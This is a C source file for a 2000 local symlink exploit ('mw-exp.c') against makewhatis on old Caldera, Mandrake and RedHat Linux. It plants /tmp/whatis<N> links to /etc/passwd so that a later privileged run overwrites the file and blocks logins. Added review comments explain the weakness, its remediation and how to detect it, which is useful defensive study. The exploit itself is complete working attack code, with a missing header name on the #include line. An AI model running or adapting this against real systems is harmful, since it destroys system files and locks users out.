/* mw-exp.c makewhatis exploit */
/* grazer@hit2000.org <-- mail comments.. [2000]*/
/* After running this file.. wait (one day on caldera system) */
/* until makewhatis is ran again [2000]*/
/* when it is ran, the database will be written to /etc/passwd */
/* making it impossible to login. [2000]*/
/* gtx to #hit2000 and #darknet */
/* 15-7-2000 GrAzEr1 */
/* Vulnerable: Caldera OpenLinux 2.4 / 2.3
               Linux Mandrake 7.1 / 7.0 / 6.1 / 6.0
               RedHat Linux 6.2 / 6.1 / 6.0 / 5.2 */

/*
 * Review notes (defensive reading of this listing).
 *
 * Weakness class: symlink following through a predictable path under the
 * shared /tmp directory (CWE-59 link following, CWE-377 insecure temporary
 * file). The program pre-creates directories named /tmp/whatis<N>, each
 * holding a symlink called "w" that points at TARGET_FILE. According to the
 * author's header, a later makewhatis run then writes its database through
 * that link.
 *
 * NOTE(review): that makewhatis works in /tmp/whatis<PID>/w is inferred from
 * the path names and the "process id" remark in the loop comment; the
 * makewhatis script itself is not shown on this page.
 *
 * Impact as stated by the author: /etc/passwd is overwritten and logins stop
 * working (integrity and availability). Nothing here shows code execution.
 *
 * Remediation belongs in the privileged script, not here: create the work
 * directory with mktemp -d or mkdtemp(3) so the name is unpredictable and
 * creation fails if the path already exists, and create the output file with
 * O_CREAT|O_EXCL|O_NOFOLLOW so a pre-planted link is refused.
 *
 * Detection: directories matching /tmp/whatis<digits> that are not owned by
 * root and contain a symlink named "w" whose target lies outside /tmp; a
 * burst of mkdir and ln child processes from one unprivileged account.
 */

/* NOTE(review): the header name after #include is missing in this copy
   (most likely an angle-bracketed name stripped as markup), so the listing
   does not preprocess as shown. It is left as found. */
#include

/* File the planted links point at. The trailing space is deliberate: it
   separates the link target from the link name when cmd2 is assembled. */
#define TARGET_FILE "/etc/passwd "

/*
 * Builds and runs two shell commands per loop pass, for the suffixes 1..101:
 *   mkdir /tmp/whatis<i>
 *   ln -s /etc/passwd /tmp/whatis<i>/w
 * Takes no arguments. Declared without a return type (implicit int) and
 * falls off the end without a return statement.
 */
main()
{
    /* Fixed 102-byte buffers filled with unbounded strcpy/strcat/sprintf;
       the inputs are short string constants plus a decimal counter. */
    char cmd[102], temp[102], cmd2[102];
    char *mkdir = "mkdir /tmp/whatis", *w = "w", *slash = "/";
    char *symlink = "ln -s ", *whatis = "/tmp/whatis";
    int counter[102];
    int i = 0;

    while(i<=100) /* define the range of the process id here, there might be a lot directories needed to let this sploit work. (advise : 10000 ? ) */
    {
        i++;            /* incremented before use, so suffixes run 1..101 */
        counter[i]=i;   /* only read back by the sprintf below */
        strcpy(cmd, mkdir);
        strcpy(cmd2, symlink);
        sprintf(temp,"%d",counter[i]);
        strcat(cmd, temp);          /* cmd:  mkdir /tmp/whatis<i> */
        strcat(cmd2, TARGET_FILE);
        strcat(cmd2, whatis);
        strcat(cmd2, temp);
        strcat(cmd2, slash);
        strcat(cmd2, w);            /* cmd2: ln -s /etc/passwd /tmp/whatis<i>/w */
        printf("\n Hold on. Making dirs and symlinks (/tmp) \n");
        system("clear");            /* screen is cleared right after the message */
        /* Return values are ignored, so a directory that already exists or a
           link that fails to be created goes unnoticed. */
        system(cmd);
        system(cmd2);
    }
    printf (" Now sit back and relax until makewhatis is ran again.. :-)\n");
}
/* www.hack.co.za [18 July 2000]*/